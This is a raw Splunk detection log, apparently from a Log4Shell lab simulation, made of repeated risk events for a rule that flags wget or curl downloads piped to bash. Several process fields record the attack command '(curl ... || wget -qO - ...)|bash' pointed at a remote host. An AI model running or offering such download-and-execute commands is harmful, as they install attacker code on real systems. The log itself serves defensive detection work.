lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with 